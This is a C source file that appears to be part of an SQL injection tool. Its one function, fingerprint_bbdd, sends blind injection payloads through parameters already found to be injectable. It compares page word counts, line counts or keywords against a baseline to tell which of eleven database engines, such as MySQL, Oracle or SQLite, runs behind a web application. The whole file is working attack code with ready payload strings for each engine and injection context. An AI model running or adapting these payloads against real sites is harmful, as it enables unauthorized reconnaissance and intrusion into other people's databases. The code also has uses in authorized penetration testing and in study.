/*
 * <fingerprint.c>
 */


#include "sqlibf.h"


//
// FINGERPRINT_BBDD _______________________________________________________________
//
// Uso: Intenta averiguar cual es la BBDD usada
//

int fingerprint_bbdd(struct cracked_url cu) {
  struct assembled_url au;
  struct result resultado;
  int comparacion;
  struct query_string *ptr_param;
  int counter=1;
  int original=0;
  int added_words=4;


  IMPRIME("[ 3.0 ] Trying to Fingerprint Database\n");

  ptr_param=cu.url_params;

  while(counter<=cu.param_num) {
    if(ptr_param->siguiente==0) ptr_param=cu.post_params;
    if(ptr_param->is_injectable) {

      base_error.body_words=ptr_param->error_words;
      base_error.body_lines=ptr_param->error_lines;
      if(ptr_param->is_dinamic==DINAMIC_KEY) strncpy(key_word, ptr_param->my_keyword, WORD_SIZE-1);
      if(ptr_param->is_dinamic==DINAMIC_LW && options.test_type==KEY_WORD) { options.test_type=LINES; original=KEY_WORD; }

      IMPRIME("[ 3.%d.0 ] Fingerprinting Database at Parameter: '%s'\n", counter, variable_name(cu, counter));

      ptr_param->terminator=FINGER;


      // MySQL

      if(!options.database || options.database==MYSQL) {

        IMPRIME("[ 3.%d.1 ] Testing MySQL\n", counter);

        au=assemble_url(cu, counter, " and CONNECTION_ID()=CONNECTION_ID() and ");
        if(ptr_param->is_injectable==NUMERIC) { au=assemble_url(cu, counter, "-(CONNECTION_ID()-CONNECTION_ID())"); added_words=0; }
        if(ptr_param->is_injectable==STRING_CONCAT_PLUS) { au=assemble_url(cu, counter, "+char(CONNECTION_ID()-CONNECTION_ID())+'"); added_words=0; }

        resultado=get_url(au); free(au.url); free(au.post);

        if(options.test_type==WORDS) comparacion=abs(resultado.body_words-base_result.body_words)-added_words;
        if(options.test_type==LINES) comparacion=abs(resultado.body_lines-base_result.body_lines);
        if(options.test_type==KEY_WORD) comparacion=is_inlist(key_word, resultado.word_list, resultado.word_count);

        if(resultado.codigo_http==base_result.codigo_http && comparacion<1 && ptr_param->is_injectable!=STRING_CONCAT_PIPE && ptr_param->is_injectable!=SELECT_CASE_NUMERIC) {

          IMPRIME("[ 3.%d.2 ] Confirming MySQL\n", counter);

          au=assemble_url(cu, counter, " and USER()=USER() and ");
          if(ptr_param->is_injectable==NUMERIC) au=assemble_url(cu, counter, "-(USER()-USER())");
          if(ptr_param->is_injectable==STRING_CONCAT_PLUS) au=assemble_url(cu, counter, "+char(USER()-USER())+'");

          resultado=get_url(au); free(au.url); free(au.post);

          if(options.test_type==WORDS) comparacion=abs(resultado.body_words-base_result.body_words)-added_words;
          if(options.test_type==LINES) comparacion=abs(resultado.body_lines-base_result.body_lines);
          if(options.test_type==KEY_WORD) comparacion=is_inlist(key_word, resultado.word_list, resultado.word_count);

          if(resultado.codigo_http==base_result.codigo_http && comparacion<1) {
            IMPRIME("==> FOUND FINGERPRINT - Database: MySQL\n");

            IMPRIME("[ 3.%d.3 ] Testing if MySQL version >= 4\n", counter);

            au=assemble_url(cu, counter, " and VERSION()>=4 and ");
            if(ptr_param->is_injectable==NUMERIC) au=assemble_url(cu, counter, "-(sign(VERSION()-4)-1)");
            if(ptr_param->is_injectable==STRING_CONCAT_PLUS) au=assemble_url(cu, counter, "+substring('1',1,(sign(VERSION()-4)-1))+'");

            resultado=get_url(au); free(au.url); free(au.post);

            if(options.test_type==WORDS) comparacion=abs(resultado.body_words-base_result.body_words)-added_words;
            if(options.test_type==LINES) comparacion=abs(resultado.body_lines-base_result.body_lines);
            if(options.test_type==KEY_WORD) comparacion=is_inlist(key_word, resultado.word_list, resultado.word_count);

            if(resultado.codigo_http==base_result.codigo_http && comparacion<1) {
              IMPRIME("==> OK: MySQL Version >= 4\n");
              return MYSQL4;
              } else {
              IMPRIME("==> MySQL Version < 4 (Can't do UNION)\n");
              return MYSQL;
              }

            }

          }

        }


      // MS SQL Server

      if(!options.database || options.database==MSSQL) {

        IMPRIME("[ 3.%d.4 ] Testing Microsoft SQL Server\n", counter);

        au=assemble_url(cu, counter, " and len(1)=1 and ");
        if(ptr_param->is_injectable==NUMERIC) { au=assemble_url(cu, counter, "-(len(1)-1)"); added_words=0; }
        if(ptr_param->is_injectable==STRING_CONCAT_PLUS) { au=assemble_url(cu, counter, "+substring('1',1,(len(1)-1))+'"); added_words=0; }
        if(ptr_param->is_injectable==SELECT_CASE_NUMERIC) au=assemble_url(cu, counter, "-(select case when len(1)=1 then 1/0 else 0 end)");

        resultado=get_url(au); free(au.url); free(au.post);

        if(options.test_type==WORDS) comparacion=abs(resultado.body_words-base_result.body_words)-added_words;
        if(options.test_type==LINES) comparacion=abs(resultado.body_lines-base_result.body_lines);
        if(options.test_type==KEY_WORD) comparacion=is_inlist(key_word, resultado.word_list, resultado.word_count);

        if(resultado.codigo_http==base_result.codigo_http && comparacion<1 && ptr_param->is_injectable!=STRING_CONCAT_PIPE) {

          IMPRIME("[ 3.%d.5 ] Confirming Microsoft SQL Server\n", counter);

          au=assemble_url(cu, counter, " and len(@@version)=len(@@version) and ");
          if(ptr_param->is_injectable==NUMERIC) au=assemble_url(cu, counter, "-(len(@@version)-len(@@version))");
          if(ptr_param->is_injectable==STRING_CONCAT_PLUS) au=assemble_url(cu, counter, "+substring('1',1,(len(@@version)-len(@@version)))+'");
          if(ptr_param->is_injectable==SELECT_CASE_NUMERIC) au=assemble_url(cu, counter, "-(select case when len(@@version)=len(@@version) then 1/0 else 0 end)");

          resultado=get_url(au); free(au.url); free(au.post);

          if(options.test_type==WORDS) comparacion=abs(resultado.body_words-base_result.body_words)-added_words;
          if(options.test_type==LINES) comparacion=abs(resultado.body_lines-base_result.body_lines);
          if(options.test_type==KEY_WORD) comparacion=is_inlist(key_word, resultado.word_list, resultado.word_count);

          if(resultado.codigo_http==base_result.codigo_http && comparacion<1) {
            IMPRIME("==> FOUND FINGERPRINT - Database: Microsoft SQL Server \n");
            return MSSQL;
            }

          }

        }


      // Oracle

      if(!options.database || options.database==ORACLE) {

        IMPRIME("[ 3.%d.6 ] Testing Oracle\n", counter);

        au=assemble_url(cu, counter, " and ROWNUM=ROWNUM and ");
        if(ptr_param->is_injectable==NUMERIC) { au=assemble_url(cu, counter, "-(ROWNUM-ROWNUM)"); added_words=0; }
        if(ptr_param->is_injectable==STRING_CONCAT_PIPE) { au=assemble_url(cu, counter, "||substr(1,1,(ROWNUM-ROWNUM))||'"); added_words=0; }
        if(ptr_param->is_injectable==SELECT_CASE_NUMERIC) au=assemble_url(cu, counter, "-(select case when ROWNUM=ROWNUM then 1/0 else 0 end from dual)");

        resultado=get_url(au); free(au.url); free(au.post);

        if(options.test_type==WORDS) comparacion=abs(resultado.body_words-base_result.body_words)-added_words;
        if(options.test_type==LINES) comparacion=abs(resultado.body_lines-base_result.body_lines);
        if(options.test_type==KEY_WORD) comparacion=is_inlist(key_word, resultado.word_list, resultado.word_count);

        if(resultado.codigo_http==base_result.codigo_http && comparacion<1 && ptr_param->is_injectable!=STRING_CONCAT_PLUS) {

          IMPRIME("[ 3.%d.7 ] Confirming Oracle\n", counter);

          au=assemble_url(cu, counter, " and length(SYSDATE)=length(SYSDATE) and ");
          if(ptr_param->is_injectable==NUMERIC) au=assemble_url(cu, counter, "-(length(SYSDATE)-length(SYSDATE))");
          if(ptr_param->is_injectable==STRING_CONCAT_PIPE) au=assemble_url(cu, counter, "||substr(1,1,(length(SYSDATE)-length(SYSDATE)))||'");
          if(ptr_param->is_injectable==SELECT_CASE_NUMERIC) au=assemble_url(cu, counter, "-(select case when length(SYSDATE)=length(SYSDATE) then 1/0 else 0 end from dual)");

          resultado=get_url(au); free(au.url); free(au.post);

          if(options.test_type==WORDS) comparacion=abs(resultado.body_words-base_result.body_words)-added_words;
          if(options.test_type==LINES) comparacion=abs(resultado.body_lines-base_result.body_lines);
          if(options.test_type==KEY_WORD) comparacion=is_inlist(key_word, resultado.word_list, resultado.word_count);

          if(resultado.codigo_http==base_result.codigo_http && comparacion<1) {
            IMPRIME("==> FOUND FINGERPRINT - Database: Oracle\n");
            return ORACLE;
            }

          }

        }


      // DB2

      if(!options.database || options.database==DB2) {

        IMPRIME("[ 3.%d.8 ] Testing DB2\n", counter);

        au=assemble_url(cu, counter, " and value(1,1)=1 and ");
        if(ptr_param->is_injectable==NUMERIC) { au=assemble_url(cu, counter, "-(value(1,1)-1)"); added_words=0; }
        if(ptr_param->is_injectable==STRING_CONCAT_PIPE) { au=assemble_url(cu, counter, "||substr('1',1,(value(1,1)-1))||'"); added_words=0; }
        if(ptr_param->is_injectable==SELECT_CASE_NUMERIC) au=assemble_url(cu, counter, "-(select case when value(1,1)=1 then 1/abs(0) else 0 end from sysibm.systables)");


        resultado=get_url(au); free(au.url); free(au.post);

        if(options.test_type==WORDS) comparacion=abs(resultado.body_words-base_result.body_words)-added_words;
        if(options.test_type==LINES) comparacion=abs(resultado.body_lines-base_result.body_lines);
        if(options.test_type==KEY_WORD) comparacion=is_inlist(key_word, resultado.word_list, resultado.word_count);

        if(resultado.codigo_http==base_result.codigo_http && comparacion<1 && ptr_param->is_injectable!=STRING_CONCAT_PLUS) {

          IMPRIME("[ 3.%d.9 ] Confirming DB2\n", counter);

          au=assemble_url(cu, counter, " and length(CURRENT SERVER)=length(CURRENT SERVER) and "); added_words=6;
          if(ptr_param->is_injectable==NUMERIC) { au=assemble_url(cu, counter, "-(length(CURRENT SERVER)-length(CURRENT SERVER))"); added_words=2; }
          if(ptr_param->is_injectable==STRING_CONCAT_PIPE) { au=assemble_url(cu, counter, "||substr('1',1,(length(CURRENT SERVER)-length(CURRENT SERVER)))||'"); added_words=2; }
          if(ptr_param->is_injectable==SELECT_CASE_NUMERIC) au=assemble_url(cu, counter, "-(select case when length(CURRENT SERVER)=length(CURRENT SERVER) then 1/abs(0) else 0 end from sysibm.systables)");

          resultado=get_url(au); free(au.url); free(au.post);

          if(options.test_type==WORDS) comparacion=abs(resultado.body_words-base_result.body_words)-added_words;
          if(options.test_type==LINES) comparacion=abs(resultado.body_lines-base_result.body_lines);
          if(options.test_type==KEY_WORD) comparacion=is_inlist(key_word, resultado.word_list, resultado.word_count);

          added_words=4;

          if(resultado.codigo_http==base_result.codigo_http && comparacion<1) {
            IMPRIME("==> FOUND FINGERPRINT - Database: IBM DB2\n");
            return DB2;
            }

          }

        }


      // PostgreSQL

      if(!options.database || options.database==POSTGRESQL) {

        IMPRIME("[ 3.%d.10 ] Testing PostgreSQL\n", counter);

        au=assemble_url(cu, counter, " and length(1)=1 and ");
        if(ptr_param->is_injectable==NUMERIC) { au=assemble_url(cu, counter, "-(length(1)-1)"); added_words=0; }
        if(ptr_param->is_injectable==STRING_CONCAT_PIPE) { au=assemble_url(cu, counter, "||substr(1,1,(length(1)-1))||'"); added_words=0; }
        if(ptr_param->is_injectable==SELECT_CASE_NUMERIC) au=assemble_url(cu, counter, "-(select case when length(1)=1 then 1/(length(USER)-length(USER)) else 0 end)");

        resultado=get_url(au); free(au.url); free(au.post);

        if(options.test_type==WORDS) comparacion=abs(resultado.body_words-base_result.body_words)-added_words;
        if(options.test_type==LINES) comparacion=abs(resultado.body_lines-base_result.body_lines);
        if(options.test_type==KEY_WORD) comparacion=is_inlist(key_word, resultado.word_list, resultado.word_count);

        if(resultado.codigo_http==base_result.codigo_http && comparacion<1 && ptr_param->is_injectable!=STRING_CONCAT_PLUS) {

          IMPRIME("[ 3.%d.11 ] Confirming PostgreSQL\n", counter);

          au=assemble_url(cu, counter, " and length(SESSION_USER)=length(SESSION_USER) and ");
          if(ptr_param->is_injectable==NUMERIC) au=assemble_url(cu, counter, "-(length(SESSION_USER)-length(SESSION_USER))");
          if(ptr_param->is_injectable==STRING_CONCAT_PIPE) au=assemble_url(cu, counter, "||substr(1,1,(length(SESSION_USER)-length(SESSION_USER)))||'");
          if(ptr_param->is_injectable==SELECT_CASE_NUMERIC) au=assemble_url(cu, counter, "-(select case when length(SESSION_USER)=length(SESSION_USER) then 1/(length(USER)-length(USER)) else 0 end)");

          resultado=get_url(au); free(au.url); free(au.post);

          if(options.test_type==WORDS) comparacion=abs(resultado.body_words-base_result.body_words)-added_words;
          if(options.test_type==LINES) comparacion=abs(resultado.body_lines-base_result.body_lines);
          if(options.test_type==KEY_WORD) comparacion=is_inlist(key_word, resultado.word_list, resultado.word_count);

          if(resultado.codigo_http==base_result.codigo_http && comparacion<1) {
            IMPRIME("==> FOUND FINGERPRINT - Database: PostgreSQL\n");
            return POSTGRESQL;
            }

          }

        }


      // Informix

      if(!options.database || options.database==INFORMIX) {

        IMPRIME("[ 3.%d.12 ] Testing Informix\n", counter);

        au=assemble_url(cu, counter, " and length(DBSERVERNAME)=length(DBSERVERNAME) and ");
        if(ptr_param->is_injectable==NUMERIC) { au=assemble_url(cu, counter, "-(length(DBSERVERNAME)-length(DBSERVERNAME))"); added_words=0; }
        if(ptr_param->is_injectable==STRING_CONCAT_PIPE) { au=assemble_url(cu, counter, "||substr(1,1,(length(DBSERVERNAME)-length(DBSERVERNAME)))||'"); added_words=0; }

        resultado=get_url(au); free(au.url); free(au.post);

        if(options.test_type==WORDS) comparacion=abs(resultado.body_words-base_result.body_words)-added_words;
        if(options.test_type==LINES) comparacion=abs(resultado.body_lines-base_result.body_lines);
        if(options.test_type==KEY_WORD) comparacion=is_inlist(key_word, resultado.word_list, resultado.word_count);

        if(resultado.codigo_http==base_result.codigo_http && comparacion<1 && ptr_param->is_injectable!=STRING_CONCAT_PLUS) {

          IMPRIME("[ 3.%d.13 ] Confirming Informix\n", counter);

          au=assemble_url(cu, counter, " and length(SITENAME)=length(SITENAME) and ");
          if(ptr_param->is_injectable==NUMERIC) au=assemble_url(cu, counter, "-(length(SITENAME)-length(SITENAME))");
          if(ptr_param->is_injectable==STRING_CONCAT_PIPE) au=assemble_url(cu, counter, "||substr(1,1,(length(SITENAME)-length(SITENAME)))||'");

          resultado=get_url(au); free(au.url); free(au.post);

          if(options.test_type==WORDS) comparacion=abs(resultado.body_words-base_result.body_words)-added_words;
          if(options.test_type==LINES) comparacion=abs(resultado.body_lines-base_result.body_lines);
          if(options.test_type==KEY_WORD) comparacion=is_inlist(key_word, resultado.word_list, resultado.word_count);

          if(resultado.codigo_http==base_result.codigo_http && comparacion<1) {
            IMPRIME("==> FOUND FINGERPRINT - Database: Informix\n");
            return INFORMIX;
            }

          }

        }


      // Sybase

      if(!options.database || options.database==SYBASE) {

        IMPRIME("[ 3.%d.14 ] Testing Sybase\n", counter);

        au=assemble_url(cu, counter, " and char_length(db_name())=char_length(db_name()) and ");
        if(ptr_param->is_injectable==NUMERIC) { au=assemble_url(cu, counter, "-(char_length(db_name())-char_length(db_name()))"); added_words=0; }
        if(ptr_param->is_injectable==STRING_CONCAT_PLUS) { au=assemble_url(cu, counter, "+char(char_length(db_name())-char_length(db_name()))+'"); added_words=0; }

        resultado=get_url(au); free(au.url); free(au.post);

        if(options.test_type==WORDS) comparacion=abs(resultado.body_words-base_result.body_words)-added_words;
        if(options.test_type==LINES) comparacion=abs(resultado.body_lines-base_result.body_lines);
        if(options.test_type==KEY_WORD) comparacion=is_inlist(key_word, resultado.word_list, resultado.word_count);

        if(resultado.codigo_http==base_result.codigo_http && comparacion<1 && ptr_param->is_injectable!=STRING_CONCAT_PIPE) {

          IMPRIME("[ 3.%d.15 ] Confirming Sybase\n", counter);

          au=assemble_url(cu, counter, " and char_length(@@servername)=char_length(@@servername) and ");
          if(ptr_param->is_injectable==NUMERIC) au=assemble_url(cu, counter, "-(char_length(@@servername)-char_length(@@servername))");
          if(ptr_param->is_injectable==STRING_CONCAT_PLUS) au=assemble_url(cu, counter, "+char(char_length(@@servername)-char_length(@@servername))+'");

          resultado=get_url(au); free(au.url); free(au.post);

          if(options.test_type==WORDS) comparacion=abs(resultado.body_words-base_result.body_words)-added_words;
          if(options.test_type==LINES) comparacion=abs(resultado.body_lines-base_result.body_lines);
          if(options.test_type==KEY_WORD) comparacion=is_inlist(key_word, resultado.word_list, resultado.word_count);

          if(resultado.codigo_http==base_result.codigo_http && comparacion<1) {
            IMPRIME("==> FOUND FINGERPRINT - Database: Sybase\n");
            return SYBASE;
            }

          }

        }


      // MS Access

      if(!options.database || options.database==ACCESS) {

        IMPRIME("[ 3.%d.16 ] Testing Microsoft Access\n", counter);

        au=assemble_url(cu, counter, " and Time()=Time() and ");
        if(ptr_param->is_injectable==NUMERIC) { au=assemble_url(cu, counter, "-(Time()-Time())"); added_words=0; }
        if(ptr_param->is_injectable==STRING_CONCAT_PLUS) { au=assemble_url(cu, counter, "+mid('1',1,(Time()-Time()))+'"); added_words=0; }

        resultado=get_url(au); free(au.url); free(au.post);

        if(options.test_type==WORDS) comparacion=abs(resultado.body_words-base_result.body_words)-added_words;
        if(options.test_type==LINES) comparacion=abs(resultado.body_lines-base_result.body_lines);
        if(options.test_type==KEY_WORD) comparacion=is_inlist(key_word, resultado.word_list, resultado.word_count);

        if(resultado.codigo_http==base_result.codigo_http && comparacion<1 && ptr_param->is_injectable!=STRING_CONCAT_PIPE) {

          IMPRIME("[ 3.%d.17 ] Confirming Microsoft Access\n", counter);

          au=assemble_url(cu, counter, " and IsNumeric(1)=IsNumeric(1) and ");
          if(ptr_param->is_injectable==NUMERIC) au=assemble_url(cu, counter, "-(IsNumeric(1)-IsNumeric(1))");
          if(ptr_param->is_injectable==STRING_CONCAT_PLUS) au=assemble_url(cu, counter, "+mid('1',1,(Time()-Time()))+'");

          resultado=get_url(au); free(au.url); free(au.post);

          if(options.test_type==WORDS) comparacion=abs(resultado.body_words-base_result.body_words)-added_words;
          if(options.test_type==LINES) comparacion=abs(resultado.body_lines-base_result.body_lines);
          if(options.test_type==KEY_WORD) comparacion=is_inlist(key_word, resultado.word_list, resultado.word_count);

          if(resultado.codigo_http==base_result.codigo_http && comparacion<1) {
            IMPRIME("==> FOUND FINGERPRINT - Database: Microsoft Access\n");
            return ACCESS;
            }

          }

        }


      // Pointbase

      if(!options.database || options.database==POINTBASE) {

        IMPRIME("[ 3.%d.16 ] Testing Pointbase\n", counter);

        au=assemble_url(cu, counter, " and CURRENT_USER=CURRENT_USER and ");
        if(ptr_param->is_injectable==NUMERIC) { au=assemble_url(cu, counter, "-(CURRENT_USER-CURRENT_USER)"); added_words=0; }
        if(ptr_param->is_injectable==STRING_CONCAT_PIPE) { au=assemble_url(cu, counter, "||substr(1,1,(CURRENT_USER-CURRENT_USER))||'"); added_words=0; }

        resultado=get_url(au); free(au.url); free(au.post);

        if(options.test_type==WORDS) comparacion=abs(resultado.body_words-base_result.body_words)-added_words;
        if(options.test_type==LINES) comparacion=abs(resultado.body_lines-base_result.body_lines);
        if(options.test_type==KEY_WORD) comparacion=is_inlist(key_word, resultado.word_list, resultado.word_count);

        if(resultado.codigo_http==base_result.codigo_http && comparacion<1 && ptr_param->is_injectable!=STRING_CONCAT_PLUS) {

          IMPRIME("[ 3.%d.17 ] Confirming Pointbase\n", counter);

          au=assemble_url(cu, counter, " and CURRENT_SESSION=CURRENT_SESSION and ");
          if(ptr_param->is_injectable==NUMERIC) au=assemble_url(cu, counter, "-(CURRENT_SESSION-CURRENT_SESSION)");
          if(ptr_param->is_injectable==STRING_CONCAT_PIPE) au=assemble_url(cu, counter, "||substr(1,1,(CURRENT_SESSION-CURRENT_SESSION))||'");

          resultado=get_url(au); free(au.url); free(au.post);

          if(options.test_type==WORDS) comparacion=abs(resultado.body_words-base_result.body_words)-added_words;
          if(options.test_type==LINES) comparacion=abs(resultado.body_lines-base_result.body_lines);
          if(options.test_type==KEY_WORD) comparacion=is_inlist(key_word, resultado.word_list, resultado.word_count);

          if(resultado.codigo_http==base_result.codigo_http && comparacion<1) {
            IMPRIME("==> FOUND FINGERPRINT - Database: Pointbase\n");
            return POINTBASE;
            }

          }

        }


      // SQLite

      if(!options.database || options.database==SQLITE) {

        IMPRIME("[ 3.%d.18 ] Testing SQLite\n", counter);

        au=assemble_url(cu, counter, " and sqlite_version()=sqlite_version() and ");
        if(ptr_param->is_injectable==NUMERIC) { au=assemble_url(cu, counter, "-(sqlite_version()-sqlite_version())"); added_words=0; }
        if(ptr_param->is_injectable==STRING_CONCAT_PIPE) { au=assemble_url(cu, counter, "||substr(1,1,(sqlite_version()-sqlite_version()))||'"); added_words=0; }

        resultado=get_url(au); free(au.url); free(au.post);

        if(options.test_type==WORDS) comparacion=abs(resultado.body_words-base_result.body_words)-added_words;
        if(options.test_type==LINES) comparacion=abs(resultado.body_lines-base_result.body_lines);
        if(options.test_type==KEY_WORD) comparacion=is_inlist(key_word, resultado.word_list, resultado.word_count);

        if(resultado.codigo_http==base_result.codigo_http && comparacion<1 && ptr_param->is_injectable!=STRING_CONCAT_PLUS) {

          IMPRIME("[ 3.%d.19 ] Confirming SQLite\n", counter);

          au=assemble_url(cu, counter, " and last_insert_rowid()=last_insert_rowid() and ");
          if(ptr_param->is_injectable==NUMERIC) au=assemble_url(cu, counter, "-(last_insert_rowid()-last_insert_rowid())");
          if(ptr_param->is_injectable==STRING_CONCAT_PIPE) au=assemble_url(cu, counter, "||substr(1,1,(last_insert_rowid()-last_insert_rowid()))||'");

          resultado=get_url(au); free(au.url); free(au.post);

          if(options.test_type==WORDS) comparacion=abs(resultado.body_words-base_result.body_words)-added_words;
          if(options.test_type==LINES) comparacion=abs(resultado.body_lines-base_result.body_lines);
          if(options.test_type==KEY_WORD) comparacion=is_inlist(key_word, resultado.word_list, resultado.word_count);

          if(resultado.codigo_http==base_result.codigo_http && comparacion<1) {
            IMPRIME("==> FOUND FINGERPRINT - Database: SQLite\n");
            return SQLITE;
            }

          }

        }


      // Interbase/Firebird

      if(!options.database || options.database==INTERBASE) {

        IMPRIME("[ 3.%d.19 ] Testing Interbase\n", counter);

        au=assemble_url(cu, counter, " and CURRENT_TIMESTAMP=CURRENT_TIMESTAMP and ");
        if(ptr_param->is_injectable==NUMERIC) { au=assemble_url(cu, counter, "-(CURRENT_TIMESTAMP-CURRENT_TIMESTAMP)"); added_words=0; }
        if(ptr_param->is_injectable==STRING_CONCAT_PIPE) { au=assemble_url(cu, counter, "||substring(1 from 1 for (CURRENT_TIMESTAMP-CURRENT_TIMESTAMP))||'"); added_words=0; }

        resultado=get_url(au); free(au.url); free(au.post);

        if(options.test_type==WORDS) comparacion=abs(resultado.body_words-base_result.body_words)-added_words;
        if(options.test_type==LINES) comparacion=abs(resultado.body_lines-base_result.body_lines);
        if(options.test_type==KEY_WORD) comparacion=is_inlist(key_word, resultado.word_list, resultado.word_count);

        if(resultado.codigo_http==base_result.codigo_http && comparacion<1 && ptr_param->is_injectable!=STRING_CONCAT_PLUS) {

          IMPRIME("[ 3.%d.20 ] Confirming Interbase\n", counter);

          au=assemble_url(cu, counter, " and CURRENT_ROLE=CURRENT_ROLE and ");
          if(ptr_param->is_injectable==NUMERIC) au=assemble_url(cu, counter, "-(CURRENT_CONNECTION-CURRENT_CONNECTION)");
          if(ptr_param->is_injectable==STRING_CONCAT_PIPE) au=assemble_url(cu, counter, "||substring(1 from 1 for (CURRENT_CONNECTION-CURRENT_CONNECTION))||'");

          resultado=get_url(au); free(au.url); free(au.post);

          if(options.test_type==WORDS) comparacion=abs(resultado.body_words-base_result.body_words)-added_words;
          if(options.test_type==LINES) comparacion=abs(resultado.body_lines-base_result.body_lines);
          if(options.test_type==KEY_WORD) comparacion=is_inlist(key_word, resultado.word_list, resultado.word_count);

          if(resultado.codigo_http==base_result.codigo_http && comparacion<1) {
            IMPRIME("==> FOUND FINGERPRINT - Database: Interbase/Firebird\n");
            return INTERBASE;
            }

          }

        }


      // Other
      if(original) options.test_type=KEY_WORD;

    }

    ptr_param=ptr_param->siguiente;
    counter++;

  }

  IMPRIME("==> CAN'T FINGERPRINT DATABASE.\n");
  return 0;

}
